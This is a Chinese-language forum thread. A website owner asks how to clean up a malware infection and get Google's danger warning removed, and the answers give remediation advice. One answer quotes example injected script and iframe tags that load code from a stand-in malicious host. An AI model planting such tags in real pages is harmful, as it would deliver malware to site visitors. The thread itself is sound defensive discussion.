我的网站 www.sagamountain.com 最近被恶意软件分发者感染了(或者至少我认为可能被感染了)。
我已经删除了所有外部内容、谷歌广告、萤火虫聊天等。
我上传了几周前的备份,当时没有任何问题。
我修补了 SQL 注入漏洞。
现在,要花多长时间才能取消其危险标记?我在哪里可以联系谷歌?
我不确定这里是否是发布该内容的正确地方,但由于这可能是服务器问题,我可能也会发布。网站可以通过病毒在整个服务器上注入 base64 代码吗,还是只能通过 sql 注入?
谢谢您的帮助,病毒让我很害怕。
是否有在线病毒扫描程序可以扫描我的页面并告诉我出了什么问题?
答案1
关于谷歌,请查看其关于受恶意软件感染的网站的页面。
您需要登录他们的网站管理员工具页面,将您的网站添加到您的帐户并执行验证步骤。然后您将有权执行诸如请求审核您的网站是否不再受感染等操作。
答案2
这是目前比较常见的问题。许多蠕虫试图通过 SQL 注入或修改本地 .html 内容(然后将其上传到 Web 服务器)进入您的服务器代码。通常,它们会尝试:
<script src='http://badwebsite.ru/blah.js'></script>
或者
<iframe src='http://badwebsite.ru/blah.html' />
通过 SQL 注入或源代码修改进入您的源页面。
据我所知,蠕虫通过 JavaScript 混淆引擎或类似引擎修改其攻击媒介,因此很难扫描。
这些攻击是由于最近两次大规模远程代码执行事件而发生的:
- Adobe Flash JavaScript 漏洞允许使用大约 15K 的任意代码创建 Flash 对象。
- 针对 Windows 系统上 Microsoft .NET 3.5 安装的 Firefox 中的 Windows Presentation Framework 扩展的漏洞。
这两者都是巨大的安全风险。
在Web应用程序开发中,应尽可能使用参数绑定,以避免SQL注入攻击。